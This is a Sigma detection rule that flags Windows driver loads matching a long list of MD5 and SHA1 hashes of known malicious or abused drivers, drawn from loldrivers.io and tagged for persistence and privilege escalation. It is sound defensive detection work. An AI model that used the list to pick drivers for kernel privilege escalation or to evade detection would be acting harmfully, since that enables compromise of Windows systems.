view Sigma YAML

title: Malicious Driver Load
id: 05296024-fe8a-4baf-8f3d-9a5f5624ceb2
status: test
description: Detects loading of known malicious drivers via their hash.
references:
    - https://loldrivers.io/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-18
modified: 2023-12-02
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1543.003
    - attack.t1068
logsource:
    product: windows
    category: driver_load
detection:
    selection:
        Hashes|contains:
            - 'MD5=5be61a24f50eb4c94d98b8a82ef58dcf'
            - 'MD5=d70a80fc73dd43469934a7b1cc623c76'
            - 'MD5=3b71eab204a5f7ed77811e41fed73105'
            - 'MD5=528ce5ce19eb34f401ef024de7ddf222'
            - 'MD5=ae548418b491cd3f31618eb9e5730973'
            - 'MD5=72f53f55898548767e0276c472be41e8'
            - 'MD5=508faa4647f305a97ed7167abc4d1330'
            - 'MD5=ed2b653d55c03f0bffa250372d682b75'
            - 'MD5=0d2ba47286f1c68e87622b3a16bf9d92'
            - 'MD5=3164bd6c12dd0fe1bdf3b833d56323b9'
            - 'MD5=70fd7209ce5c013a1f9e699b5cc86cdc'
            - 'MD5=c71be7b112059d2dc84c0f952e04e6cc'
            - 'MD5=acac842a46f3501fe407b1db1b247a0b'
            - 'MD5=01c2e4d8234258451083d6ce4e8910b7'
            - 'MD5=c8541a9cef64589593e999968a0385b9'
            - 'MD5=e172a38ade3aa0a2bc1bf9604a54a3b5'
            - 'MD5=6fcf56f6ca3210ec397e55f727353c4a'
            - 'MD5=2b80be31fbb11d4c1ef6d6a80b2e0c16'
            - 'MD5=07056573d464b0f5284f7e3acedd4a3f'
            - 'MD5=c7b7f1edb9bbef174e6506885561d85d'
            - 'MD5=d5918d735a23f746f0e83f724c4f26e5'
            - 'MD5=84763d8ca9fe5c3bff9667b2adf667de'
            - 'MD5=fb593b1f1f80d20fc7f4b818065c64b6'
            - 'MD5=909f3fc221acbe999483c87d9ead024a'
            - 'MD5=e29f6311ae87542b3d693c1f38e4e3ad'
            - 'MD5=aeb0801f22d71c7494e884d914446751'
            - 'MD5=3f11a94f1ac5efdd19767c6976da9ba4'
            - 'MD5=be6318413160e589080df02bb3ca6e6a'
            - 'MD5=0b311af53d2f4f77d30f1aed709db257'
            - 'MD5=d075d56dfce6b9b13484152b1ef40f93'
            - 'MD5=27384ec4c634701012a2962c30badad2'
            - 'MD5=5eb2c576597dd21a6b44557c237cf896'
            - 'MD5=f56db4eba3829c0918413b5c0b42f00f'
            - 'MD5=e27b2486aa5c256b662812b465b6036c'
            - 'MD5=db86dfd7aefbb5be6728a63461b0f5f3'
            - 'MD5=04a88f5974caa621cee18f34300fc08a'
            - 'MD5=5129d8fd53d6a4aba81657ab2aa5d243'
            - 'MD5=cd2c641788d5d125c316ed739c69bb59'
            - 'MD5=7073cd0085fcba1cd7d3568f9e6d652c'
            - 'MD5=24f0f2b4b3cdae11de1b81c537df41c7'
            - 'MD5=88bea56ae9257b40063785cf47546024'
            - 'MD5=63060b756377fce2ce4ab9d079ca732f'
            - 'MD5=50b39072d0ee9af5ef4824eca34be6e3'
            - 'MD5=57c18a8f5d1ba6d015e4d5bc698e3624'
            - 'MD5=7d26985a5048bad57d9c223362f3d55c'
            - 'MD5=ba54a0dbe2685e66e21d41b4529b3528'
            - 'MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11'
            - 'MD5=b52f51bbe6b49d0b475d943c29c4d4cb'
            - 'MD5=a837302307dace2a00d07202b661bce2'
            - 'MD5=78a122d926ccc371d60c861600c310f3'
            - 'MD5=bdb305aa0806f8b38b7ce43c927fe919'
            - 'MD5=27053e964667318e1b370150cbca9138'
            - 'MD5=6a4fbcfb44717eae2145c761c1c99b6a'
            - 'MD5=d13c1b76b4a1ca3ff5ab63678b51df6d'
            - 'MD5=6a066d2be83cf83f343d0550b0b8f206'
            - 'MD5=7108b0d4021af4c41de2c223319cd4c1'
            - 'MD5=1cd158a64f3d886357535382a6fdad75'
            - 'MD5=e939448b28a4edc81f1f974cebf6e7d2'
            - 'MD5=4198d3db44d7c4b3ba9072d258a4fc2d'
            - 'MD5=4a27a2bdc6fbe39eeec6455fb1e0ef20'
            - 'MD5=30ca3cc19f001a8f12c619daa8c6b6e3'
            - 'MD5=fe9004353b25640f6a879e57f07122d7'
            - 'MD5=06c7fcf3523235cf52b3eee083ec07b2'
            - 'MD5=364605ad21b9275681cffef607fac273'
            - 'MD5=968ddb06af90ef83c5f20fbdd4eee62e'
            - 'MD5=ba50bd645d7c81416bb26a9d39998296'
            - 'MD5=29e03f4811b64969e48a99300978f58c'
            - 'MD5=b0770094c3c64250167b55e4db850c04'
            - 'MD5=40b968ecdbe9e967d92c5da51c390eee'
            - 'MD5=b6b530dd25c5eb66499968ec82e8791e'
            - 'MD5=f209cb0e468ca0b76d879859d5c8c54e'
            - 'MD5=76f8607fc4fb9e828d613a7214436b66'
            - 'MD5=4b058945c9f2b8d8ebc485add1101ba5'
            - 'MD5=faae7f5f69fde12303dd1c0c816b72b7'
            - 'MD5=89d294ef7fefcdf1a6ca0ab96a856f57'
            - 'MD5=ef0e1725aaf0c6c972593f860531a2ea'
            - 'MD5=bbdbffebfc753b11897de2da7c9912a5'
            - 'MD5=5ebfc0af031130ba9de1d5d3275734b3'
            - 'MD5=22949977ce5cd96ba674b403a9c81285'
            - 'MD5=77cfd3943cc34d9f5279c330cd8940bc'
            - 'MD5=311de109df18e485d4a626b5dbe19bc6'
            - 'MD5=2730cc25ad385acc7213a1261b21c12d'
            - 'MD5=87dc81ebe85f20c1a7970e495a778e60'
            - 'MD5=154b45f072fe844676e6970612fd39c7'
            - 'MD5=5a4fe297c7d42539303137b6d75b150d'
            - 'MD5=d6a1dd7b2c06f058b408b3613c13d413'
            - 'MD5=a6e9d6505f6d2326a8a9214667c61c67'
            - 'MD5=7fad9f2ef803496f482ce4728578a57a'
            - 'MD5=5076fba3d90e346fd17f78db0a4aa12c'
            - 'MD5=79df0eabbf2895e4e2dae15a4772868c'
            - 'MD5=14580bd59c55185115fd3abe73b016a2'
            - 'MD5=1f2888e57fdd6aee466962c25ba7d62d'
            - 'MD5=5e9231e85cecfc6141e3644fda12a734'
            - 'MD5=dc564bac7258e16627b9de0ce39fae25'
            - 'MD5=4e4c068c06331130334f23957fca9e3c'
            - 'MD5=1ee9f6326649cd23381eb9d7dfdeddf7'
            - 'MD5=4e1f656001af3677856f664e96282a6f'
            - 'MD5=36f44643178c505ea0384e0fb241e904'
            - 'MD5=6b480fac7caca2f85be9a0cfe79aedfc'
            - 'MD5=c1ab425977d467b64f437a6c5ad82b44'
            - 'MD5=fe508caa54ffeb2285d9f00df547fe4a'
            - 'MD5=d3af70287de8757cebc6f8d45bb21a20'
            - 'MD5=990b949894b7dc82a8cf1131b063cb1a'
            - 'MD5=c62209b8a5daf3f32ad876ad6cefda1b'
            - 'MD5=c159fb0f345a8771e56aab8e16927361'
            - 'MD5=19b15eeccab0752c6793f782ca665a45'
            - 'MD5=1d51029dfbd616bf121b40a0d1efeb10'
            - 'MD5=157a22689629ec876337f5f9409918d5'
            - 'MD5=3dd829fb27353622eff34be1eabb8f18'
            - 'MD5=8636fe3724f2bcba9399daffd6ef3c7e'
            - 'MD5=3d0b3e19262099ade884b75ba86ca7e8'
            - 'MD5=97539c78d6e2b5356ce79e40bcd4d570'
            - 'MD5=0308b6888e0f197db6704ca20203eee4'
            - 'MD5=091a6bd4880048514c5dd3bede15eba5'
            - 'MD5=7e92f98b809430622b04e88441b2eb04'
            - 'MD5=bb5bda8889d8d27ef984dbd6ad82c946'
            - 'MD5=b76aee508f68b5b6dccd6e1f66f4cf8b'
            - 'MD5=a822b9e6eedf69211013e192967bf523'
            - 'MD5=df52f8a85eb64bc69039243d9680d8e4'
            - 'MD5=bfbdea0589fb77c7a7095cf5cd6e8b7a'
            - 'MD5=44857ca402a15ab51dc5afe47abdfa44'
            - 'MD5=f9844524fb0009e5b784c21c7bad4220'
            - 'MD5=d34b218c386bfe8b1f9c941e374418d7'
            - 'MD5=0ca010a32a9b0aeae1e46d666b83b659'
            - 'MD5=93496a436c5546156a69deb255a9fed0'
            - 'MD5=1cd5e231064e03c596e819b6ff48daf9'
            - 'MD5=70a71fe86df717ac59dbf856d7ac5789'
            - 'MD5=a33089d4e50f7d2ea8b52ca95d26ebf3'
            - 'MD5=e0cc9b415d884f85c45be145872892b8'
            - 'MD5=a42249a046182aaaf3a7a7db98bfa69d'
            - 'MD5=c5ae6ca044bd03c3506c132b033be1dc'
            - 'MD5=7ebe606acd81abf1f8cb0767c974164b'
            - 'MD5=b5dcc869a91efcc6e8ea0c3c07605d63'
            - 'MD5=62c18d61ed324088f963510bae43b831'
            - 'MD5=093a2a635c3a27aac50efd6463f4efa1'
            - 'MD5=28102acca39ad0199f262ba9958be3f4'
            - 'MD5=650ef9dd70cb192027e536754d6e0f63'
            - 'MD5=32eb3d2bf2c5b3da2d2a1f20fffbac44'
            - 'MD5=6771b13a53b9c7449d4891e427735ea2'
            - 'MD5=072ba2309b825ce1dba37d8d924ea8ed'
            - 'MD5=2d37d2fb9b9f8ac52bc02cba4487e3cb'
            - 'MD5=1325ec39e98225e487b40043faee8052'
            - 'MD5=4484f4007de2c3ee4581a2cff77ca3b4'
            - 'MD5=a236e7d654cd932b7d11cb604629a2d0'
            - 'MD5=17509f0a98dc5c5d52c3f9ac1428a21b'
            - 'MD5=840a5edf2534dd23a082cf7b28cbfc4d'
            - 'MD5=77a7ed4798d02ef6636cd0fd07fc382a'
            - 'MD5=a9df5964635ef8bd567ae487c3d214c4'
            - 'MD5=8b75047199825c8e62fdcc1c915db8bd'
            - 'MD5=d416494232c4197cb36a914df2e17677'
            - 'MD5=4cf14a96485a1270fed97bb8000e4f86'
            - 'MD5=35e512f9bedc89dca5ce81f35820714c'
            - 'MD5=40f35792e7565aa047796758a3ce1b77'
            - 'MD5=f7f31bccc9b7b2964ac85106831022b1'
            - 'MD5=26aedc10d4215ba997495d3a68355f4a'
            - 'MD5=10f3679384a03cb487bda9621ceb5f90'
            - 'MD5=80219fb6b5954c33e16bac5ecdac651b'
            - 'MD5=cee36b5c6362993fa921435979bfbe4a'
            - 'MD5=e37a08f516b8a7ca64163f5d9e68fe5a'
            - 'MD5=49518f7375a5f995ebe9423d8f19cfe4'
            - 'MD5=920df6e42cf91bbe19707f5a86e3c5c5'
            - 'MD5=2ec877e425bd7eddb663627216e3491e'
            - 'MD5=550b7991d93534bc510bc4f237155a7a'
            - 'MD5=98d53f6b3bec0a3417a04fbb9e17fa06'
            - 'MD5=13a57a4ef721440c7c9208b51f7c05de'
            - 'MD5=c5fc3605194e033bdf3781ff2adaeb61'
            - 'MD5=6e625ec04c20a9dbd48c7060efbf5e92'
            - 'MD5=0b9b78d1281c7d4ab50497cf6ea7452a'
            - 'MD5=4e906fcb13e2793c98f47291fd69391b'
            - 'MD5=2bb353891d65c9e267eb98a3a2b694c3'
            - 'MD5=7d86cdda7f49f91fdb69901a002b34e7'
            - 'MD5=f69b06ca7c34d16f26ea1c6861edf62a'
            - 'MD5=ee6b1a79cb6641aa44c762ee90786fe0'
            - 'MD5=1fc7aeeff3ab19004d2e53eae8160ab1'
            - 'MD5=24d3ea54f25e32832ac20335a1ce1062'
            - 'MD5=c94f405c5929cfcccc8ad00b42c95083'
            - 'MD5=b164daf106566f444dfb280d743bc2f7'
            - 'MD5=93130909e562925597110a617f05e2a9'
            - 'MD5=f589d4bf547c140b6ec8a511ea47c658'
            - 'MD5=bf445ac375977ecf551bc2a912c58e8a'
            - 'MD5=629ee55e4b5a225d048fbcd5f0a1d18b'
            - 'MD5=0023ca0ca16a62d93ef51f3df98b2f94'
            - 'MD5=a3d69c7e24300389b56782aa63b0e357'
            - 'MD5=cbd8d370462503508e44dba023bdf9bc'
            - 'MD5=67daa04716803a15fc11c9e353d77c2f'
            - 'MD5=c9d4214c850e0cedf033dc8f0cd3aace'
            - 'MD5=bd5b0514f3b40f139d8079138d01b5f6'
            - 'MD5=19bdd9b799e3c2c54c0d7fff68b31c20'
            - 'MD5=f242cffd9926c0ccf94af3bf16b6e527'
            - 'MD5=5aeab9427d85951def146b4c0a44fc63'
            - 'MD5=40170485cca576adb5266cf5b0d3b0bd'
            - 'MD5=c277c4386a78fae1b7e17eaecf4f472b'
            - 'MD5=58c37866cbc3d1338e4fc58ada924ffe'
            - 'MD5=0f16a43f7989034641fd2de3eb268bf1'
            - 'MD5=0ae30291c6cbfa7be39320badd6e8de0'
            - 'MD5=05dd59bd4f175304480affd8f1305c37'
            - 'MD5=f838f4eb36f1e7036238776c7a70f0b0'
            - 'MD5=85093bb9f027027c2c61aee50796de30'
            - 'MD5=ae338d91d1b05a72559b7f6ed717362d'
            - 'MD5=bd91787b5dcb2189b856804e85dfa1d9'
            - 'MD5=6b3c1511e12f4d27a4ea3b18020d7b84'
            - 'MD5=97264fd62d4907bdac917917a07b3b7a'
            - 'MD5=6ececf26ff8b03ed7ffbddadec9a9dab'
            - 'MD5=47e6ac52431ca47da17248d80bf71389'
            - 'MD5=eb57f03b7603f0b235af62e8cd5be8c2'
            - 'MD5=e1a9aa4c14669b1fb1f67a7266f87e82'
            - 'MD5=29047f0b7790e524b09a06852d31a117'
            - 'MD5=4dd6250eb2d368f500949952eb013964'
            - 'MD5=fb7c61ef427f9b2fdff3574ee6b1819b'
            - 'MD5=844af8c877f5da723c1b82cf6e213fc1'
            - 'MD5=e39152eadd76751b1d7485231b280948'
            - 'MD5=ac6e29f535b2c42999c50d2fc32f2c9c'
            - 'MD5=2406ea37152d2154be3fef6d69ada2c6'
            - 'MD5=0ea8389589c603a8b05146bd06020597'
            - 'MD5=754e21482baf18b8b0ed0f4be462ba03'
            - 'MD5=c4a517a02ba9f6eac5cf06e3629cc076'
            - 'MD5=32282e07db321e8d7849f2287bb6a14f'
            - 'MD5=32b67a6cd6dd998b9f563ed13d54a8bc'
            - 'MD5=3359e1d4244a7d724949c63e89689ef8'
            - 'MD5=5917e415a5bf30b3fcbcbcb8a4f20ee0'
            - 'MD5=0bdd51cc33e88b5265dfb7d88c5dc8d6'
            - 'MD5=a90236e4962620949b720f647a91f101'
            - 'MD5=ccde8c94439f9fc9c42761e4b9a23d97'
            - 'MD5=68caf620ef8deaf06819cf8c80d3367b'
            - 'MD5=5fec28e8f4f76e5ede24beb32a32b9d7'
            - 'MD5=e8eac6642b882a6196555539149c73f2'
            - 'MD5=aa98b95f5cbae8260122de06a215ee10'
            - 'MD5=a5bcaa2fc87b42e2e5d62a2e5dfcbc80'
            - 'MD5=abc168fdca7169bf9dc40cec9761018d'
            - 'MD5=7f9309f5e4defec132b622fadbcad511'
            - 'MD5=4748696211bd56c2d93c21cab91e82a5'
            - 'MD5=48394dce30bb8da5ae089cb8f41b86dc'
            - 'MD5=65f800e1112864bf41eb815649f428d5'
            - 'MD5=bd25be845c151370ff177509d95d5add'
            - 'MD5=a37ed7663073319d02f2513575a22995'
            - 'MD5=2c39f6172fbc967844cac12d7ab2fa55'
            - 'MD5=491aec2249ad8e2020f9f9b559ab68a8'
            - 'MD5=1e0eb80347e723fa31fce2abb0301d44'
            - 'MD5=a26363e7b02b13f2b8d697abb90cd5c3'
            - 'MD5=4118b86e490aed091b1a219dba45f332'
            - 'MD5=6d131a7462e568213b44ef69156f10a5'
            - 'MD5=10c2ea775c9e76e7774ab89e38f38287'
            - 'SHA1=994e3f5dd082f5d82f9cc84108a60d359910ba79'
            - 'SHA1=4f7989ad92b8c47c004d3731b7602ce0934d7a23'
            - 'SHA1=f2fe02e28cf418d935ec63168caf4dff6a9fbdfe'
            - 'SHA1=af42afda54d150810a60baa7987f9f09d49d1317'
            - 'SHA1=09375f13521fc0cacf2cf0a28b2a9248f71498d7'
            - 'SHA1=c75e8fceed74a4024d38ca7002d42e1ecf982462'
            - 'SHA1=03e82eae4d8b155e22ffdafe7ba0c4ab74e8c1a7'
            - 'SHA1=e730eb971ecb493b69de2308b6412836303f733a'
            - 'SHA1=6a95860594cd8b7e3636bafa8f812e05359a64ca'
            - 'SHA1=5fef884a901e81ac173d63ade3f5c51694decf74'
            - 'SHA1=a8ddb7565b61bc021cd2543a137e00627f999dcc'
            - 'SHA1=6451522b1fb428e549976d0742df5034f8124b17'
            - 'SHA1=8ad0919629731b9a8062f7d3d4a727b28f22e81a'
            - 'SHA1=cc65bf60600b64feece5575f21ab89e03a728332'
            - 'SHA1=bbc8bd714c917bb1033f37e4808b4b002cd04166'
            - 'SHA1=4f2d9a70ea24121ae01df8a76ffba1f9cc0fde4a'
            - 'SHA1=f6a18fc9c4abe4a82c1ab28abc0a7259df8de7a3'
            - 'SHA1=c42178977bd7bbefe084da0129ed808cb7266204'
            - 'SHA1=766949d4599fbf8f45e888c9d6fedf21e04fb333'
            - 'SHA1=b7ff8536553cb236ea2607941e634b23aadb59ee'
            - 'SHA1=76789196eebfd4203f477a5a6c75eefc12d9a837'
            - 'SHA1=e5566684a9e0c1afadae80c3a8be6636f6cad7cf'
            - 'SHA1=7638c048af5beae44352764390deea597cc3e7b1'
            - 'SHA1=6a6fe0d69e0ea34d695c3b525e6db639f9ad6ac5'
            - 'SHA1=08dd35dde6187af579a1210e00eadbcea29e66d2'
            - 'SHA1=9ee31f1f25f675a12b7bad386244a9fbfa786a87'
            - 'SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e'
            - 'SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d'
            - 'SHA1=505546d82aab56889a923004654b9afdec54efe6'
            - 'SHA1=0fe2d22bd2e6b7874f4f2b6279e2ca05edd1222a'
            - 'SHA1=8aa0e832e5ca2eb79dafabadbe9948a191008383'
            - 'SHA1=844d7bcd1a928d340255ff42971cca6244a459bf'
            - 'SHA1=9e2ebc489c50b6bbae3b08473e007baa65ff208f'
            - 'SHA1=7e836dadc2e149a0b758c7e22c989cbfcce18684'
            - 'SHA1=2480549ec8564cd37519a419ab2380cf3e8bab9e'
            - 'SHA1=8b9dd4c001f17e7835fdaf0d87a2f3e026557e84'
            - 'SHA1=d3f6c3ea2ef7124403c0fb6e7e3a0558729b5285'
            - 'SHA1=40df7a55c200371853cc3fd3cc03b5ac932f5cd6'
            - 'SHA1=607387cc90b93d58d6c9a432340261fde846b1d9'
            - 'SHA1=2779c54ccd1c008cd80e88c2b454d76f4fa18c07'
            - 'SHA1=46c9a474a1a62c25a05bc7661b75a80b471616e6'
            - 'SHA1=a2fe7de67b3f7d4b1def88ce4ba080f473c0fbc6'
            - 'SHA1=b8b123a413b7bccfa8433deba4f88669c969b543'
            - 'SHA1=bf2f8ada4e80aed4710993cedf4c5d32c95cd509'
            - 'SHA1=e3a1e7ce9e9452966885371e4c7fb48a2efdef22'
            - 'SHA1=c7f0423ac5569f13d2b195e02741ad7eed839c6d'
            - 'SHA1=a111dc6ae5575977feba71ee69b790e056846a02'
            - 'SHA1=ac4ace1c21c5cb72c6edf6f2f0cc3513d7c942c3'
            - 'SHA1=d4304bc75c2cb9917bb10a1dc630b75af194f7b2'
            - 'SHA1=0de86ec7d7f16a3680df89256548301eed970393'
            - 'SHA1=b2fb5036b29b12bcec04c3152b65b67ca14d61f2'
            - 'SHA1=0883a9c54e8442a551994989db6fc694f1086d41'
            - 'SHA1=01cf1fe3937fb6585ffb468b116a3af8ddf9ef16'
            - 'SHA1=98c4406fede34c3704afd8cf536ec20d93df9a10'
            - 'SHA1=1048f641adf3988d882a159bf1332eeb6d6a7f09'
            - 'SHA1=867652e062eb6bd1b9fc29e74dea3edd611ef40c'
            - 'SHA1=78fd06c82d3ba765c38bad8f48d1821a06280e39'
            - 'SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c'
            - 'SHA1=fdbcebb6cafda927d384d7be2e8063a4377d884f'
            - 'SHA1=994dc79255aeb662a672a1814280de73d405617a'
            - 'SHA1=6abc7979ba044f31884517827afb7b4bdaa0dcc1'
            - 'SHA1=1768f9c780fe7cf66928cfceaef8ed7d985e18f5'
            - 'SHA1=5fa527e679d25a15ecc913ce6a8d0218e2ff174b'
            - 'SHA1=f11188c540eada726766e0b0b2f9dd3ae2679c61'
            - 'SHA1=8416ee8fd88c3d069fbba90e959507c69a0ee3e9'
            - 'SHA1=ab4399647ebd16c02728c702534a30eb0b7ccbe7'
            - 'SHA1=98588b1d1b63747fa6ee406983bf50ad48a2208b'
            - 'SHA1=86e6669dbbce8228e94b2a9f86efdf528f0714fd'
            - 'SHA1=c9e9198d52d94771cb14711a5f6aaf8d82b602a2'
            - 'SHA1=17fa047c1f979b180644906fe9265f21af5b0509'
            - 'SHA1=1b526cbcba09b8d663e82004cf24ef44343030d3'
            - 'SHA1=4e0f5576804dab14abb29a29edb9616a1dbe280a'
            - 'SHA1=eb76de59ebc5b2258cff0567577ff8c9d0042048'
            - 'SHA1=d4f5323da704ff2f25d6b97f38763c147f2a0e6f'
            - 'SHA1=6802e2d2d4e6ee38aa513dafd6840e864310513b'
            - 'SHA1=ac18c7847c32957abe8155bcbe71c1f35753b527'
            - 'SHA1=beed6fb6a96996e9b016fa7f2cf7702a49c8f130'
            - 'SHA1=7d453dccb25bf36c411c92e2744c24f9b801225d'
            - 'SHA1=9648ad90ec683c63cc02a99111a002f9b00478d1'
            - 'SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a'
            - 'SHA1=31fac347aa26e92db4d8c9e1ba37a7c7a2234f08'
            - 'SHA1=fde0fff1c3e4c053148748504d4b9e0cc97f37ec'
            - 'SHA1=73bac306292b4e9107147db94d0d836fdb071e33'
            - 'SHA1=9382981b05b1fb950245313992444bfa0db5f881'
            - 'SHA1=acb8e45ebd1252313ece94198df47edf9294e7d3'
            - 'SHA1=9c36600c2640007d3410dea8017573a113374873'
            - 'SHA1=53f776d9a183c42b93960b270dddeafba74eb3fb'
            - 'SHA1=1fdb2474908bdd2ee1e9bd3f224626f9361caab7'
            - 'SHA1=3533d0a54c7ccd83afd6be24f6582b30e4ca0aab'
            - 'SHA1=cb25a5125fb353496b59b910263209f273f3552d'
            - 'SHA1=a5f1b56615bdaabf803219613f43671233f2001c'
            - 'SHA1=6c7663de88a0fba1f63a984f926c6ef449059e38'
            - 'SHA1=e514dfadbeb4d2305988c3281bf105d252dee3a7'
            - 'SHA1=632c80a3c95cf589b03812539dea59594eaefae0'
            - 'SHA1=e6966e360038be3b9d8c9b2582eba4e263796084'
            - 'SHA1=675cc00de7c1ef508ccd0c91770c82342c0ad4ab'
            - 'SHA1=6ae26bde7ec27bd0fa971de6c7500eee34ee9b51'
            - 'SHA1=80e4808a7fe752cac444676dbbee174367fa2083'
            - 'SHA1=77b4f0c0b06e3dc2474d5e250b772dacaac14dd0'
            - 'SHA1=7277d965b9de91b4d8ea5eb8ae7fa3899eef63a2'
            - 'SHA1=3825ebb0b0664b5f0789371240f65231693be37d'
            - 'SHA1=de9469a5d01fb84afd41d176f363a66e410d46da'
            - 'SHA1=91568d7a82cc7677f6b13f11bea5c40cf12d281b'
            - 'SHA1=4b882748faf2c6c360884c6812dd5bcbce75ebff'
            - 'SHA1=599de57a5c05e27bb72c7b8a677e531d8e4bf8b5'
            - 'SHA1=1d373361d3129d11bc43f9b6dfa81d06e5ca8358'
            - 'SHA1=c5bd9f2b3a51ba0da08d7c84bab1f2d03a95e405'
            - 'SHA1=89165bbb761d6742ac2a6f5efbffc80c17990bd8'
            - 'SHA1=97812f334a077c40e8e642bb9872ac2c49ddb9a2'
            - 'SHA1=d417c0be261b0c6f44afdec3d5432100e420c3ed'
            - 'SHA1=37e6450c7cd6999d080da94b867ba23faa8c32fe'
            - 'SHA1=9481cd590c69544c197b4ee055056302978a7191'
            - 'SHA1=ff3e19cd461ddf67529a765cbec9cb81d84dc7da'
            - 'SHA1=6972314b6d6b0109b9d0a951eb06041f531f589b'
            - 'SHA1=dd94a2436994ac35db91e0ec9438b95e438d38c5'
            - 'SHA1=dcc852461895311b56e3ae774c8e90782a79c0b4'
            - 'SHA1=3489ed43bdd11ccbfc892baaeae8102ff7d22f25'
            - 'SHA1=e38e1efd98cd8a3cdb327d386db8df79ea08dccc'
            - 'SHA1=d4cf9296271a9c5c40b0fa34f69b6125c2d14457'
            - 'SHA1=10fb4ba6b2585ea02e7afb53ff34bf184eeb1a5d'
            - 'SHA1=f6793243ad20359d8be40d3accac168a15a327fb'
            - 'SHA1=b34a012887ddab761b2298f882858fa1ff4d99f1'
            - 'SHA1=71469dce9c2f38d0e0243a289f915131bf6dd2a8'
            - 'SHA1=10115219e3595b93204c70eec6db3e68a93f3144'
            - 'SHA1=161bae224cf184ed6c09c77fae866d42412c6d25'
            - 'SHA1=07f78a47f447e4d8a72ad4bc6a26427b9577ec82'
            - 'SHA1=2929de0b5b5e1ba1cce1908e9d800aa21f448b3d'
            - 'SHA1=745335bcdf02fb42df7d890a24858e16094f48fd'
            - 'SHA1=2a202830db58d5e942e4f6609228b14095ed2cab'
            - 'SHA1=0167259abd9231c29bec32e6106ca93a13999f90'
            - 'SHA1=c23eeb6f18f626ce1fd840227f351fa7543bb167'
            - 'SHA1=613a9df389ad612a5187632d679da11d60f6046a'
            - 'SHA1=1ce17c54c6884b0319d5aabbe7f96221f4838514'
            - 'SHA1=025c4e1a9c58bf10be99f6562476b7a0166c6b86'
            - 'SHA1=c3aafe8f67c6738489377031cb5a1197e99b202d'
            - 'SHA1=50c6b3cafc35462009d02c10f2e79373936dd7bb'
            - 'SHA1=6df35a0c2f6d7d39d24277137ea840078dafb812'
            - 'SHA1=f92faed3ef92fa5bc88ebc1725221be5d7425528'
            - 'SHA1=3bd1a88cc7dae701bc7085639e1c26ded3f8ccb3'
            - 'SHA1=a3ed5cbfbc17b58243289f3cf575bf04be49591d'
            - 'SHA1=552730553a1dea0290710465fb8189bdd0eaad42'
            - 'SHA1=0291d0457acaf0fe8ed5c3137302390469ce8b35'
            - 'SHA1=07f282db28771838d0e75d6618f70d76acfe6082'
            - 'SHA1=e6765d8866cad6193df1507c18f31fa7f723ca3e'
            - 'SHA1=22c9da04847c26188226c3a345e2126ef00aa19e'
            - 'SHA1=43501832ce50ccaba2706be852813d51de5a900f'
            - 'SHA1=cb3f30809b05cf02bc29d4a7796fb0650271e542'
            - 'SHA1=ed86bb62893e6ffcdfd2ecae2dea77fdf6bf9bde'
            - 'SHA1=3b6b35bca1b05fafbfc883a844df6d52af44ccdc'
            - 'SHA1=928b5971a0f7525209d599e2ef15c31717047022'
            - 'SHA1=b5696e2183d9387776820ef3afa388200f08f5a6'
            - 'SHA1=ebd8b7e964b8c692eea4a8c406b9cd0be621ebe2'
            - 'SHA1=fe18c58fbd0a83d67920e037d522c176704d2ca3'
            - 'SHA1=9c1c9032aa1e33461f35dbf79b6f2d061bfc6774'
            - 'SHA1=8e126f4f35e228fdd3aa78d533225db7122d8945'
            - 'SHA1=064de88dbbea67c149e779aac05228e5405985c7'
            - 'SHA1=30a80f560f18609c1123636a8a1a1ef567fa67a7'
            - 'SHA1=98130128685c8640a8a8391cb4718e98dd8fe542'
            - 'SHA1=a5914161f8a885702427cf75443fb08d28d904f0'
            - 'SHA1=48f03a13b0f6d3d929a86514ce48a9352ffef5ad'
            - 'SHA1=fff4f28287677caabc60c8ab36786c370226588d'
            - 'SHA1=bb5b17cff0b9e15f1648b4136e95bd20d899aef5'
            - 'SHA1=b2f5d3318aab69e6e0ca8da4a4733849e3f1cee2'
            - 'SHA1=635a39ff5066e1ac7c1c5995d476d8c233966dda'
            - 'SHA1=5ed22c0033aed380aa154e672e8db3a2d4c195c4'
            - 'SHA1=87e20486e804bfff393cc9ad9659858e130402a2'
            - 'SHA1=4dd86ff6f7180abebcb92e556a486abe7132754c'
            - 'SHA1=39169c9b79502251ca2155c8f1cd7e63fd9a42e9'
            - 'SHA1=7f7d144cc80129d0db3159ea5d4294c34b79b20a'
            - 'SHA1=8692274681e8d10c26ddf2b993f31974b04f5bf0'
            - 'SHA1=ea4a405445bb6e58c16b81f6d5d2c9a9edde419b'
            - 'SHA1=da970a01cecff33a99c217a42297cec4d1fe66d6'
            - 'SHA1=1f3799fed3cf43254fe30dcdfdb8dc02d82e662b'
            - 'SHA1=3d2309f7c937bfcae86097d716a8ef66c1337a3c'
            - 'SHA1=02a9314109e47c5ce52fa553ea57070bf0f8186a'
            - 'SHA1=91f832f46e4c38ecc9335460d46f6f71352cffed'
            - 'SHA1=76568d987f8603339b8d1958f76de2b957811f66'
            - 'SHA1=e841c8494b715b27b33be6f800ca290628507aba'
            - 'SHA1=b555aad38df7605985462f3899572931ee126259'
            - 'SHA1=115edd175c346fd3fbc9f113ee5ccd03b5511ee1'
            - 'SHA1=3d27013557b5e68e7212a2f78dfe60c5a2a46327'
            - 'SHA1=bb6ef5518df35d9508673d5011138add8c30fc27'
            - 'SHA1=9086e670e3a4518c0bcdf0da131748d4085ef42b'
            - 'SHA1=f6728821eddd14a21a9536e0f138c6d71cbd9307'
            - 'SHA1=34b677fba9dcab9a9016332b3332ce57f5796860'
            - 'SHA1=a63e9ecdebaf4ef9c9ec3362ff110b8859cc396d'
            - 'SHA1=8cd9df52b20b8f792ac53f57763dc147d7782b1e'
            - 'SHA1=fcae2ea5990189f6f230b51e398e3000b71897f2'
            - 'SHA1=27371f45f42383029c3c2e6d64a22e35dc772a72'
            - 'SHA1=b6eb40ea52b47f03edb8f45e2e431b5f666df8c5'
            - 'SHA1=9f27987c32321f8da099efc1dc60a73f8f629d3a'
            - 'SHA1=40372b4de2db020ce2659e1de806d4338fd7ebef'
            - 'SHA1=18693de1487c55e374b46a7728b5bf43300d4f69'
            - 'SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98'
            - 'SHA1=005754dab657ddc6dae28eee313ca2cc6a0c375c'
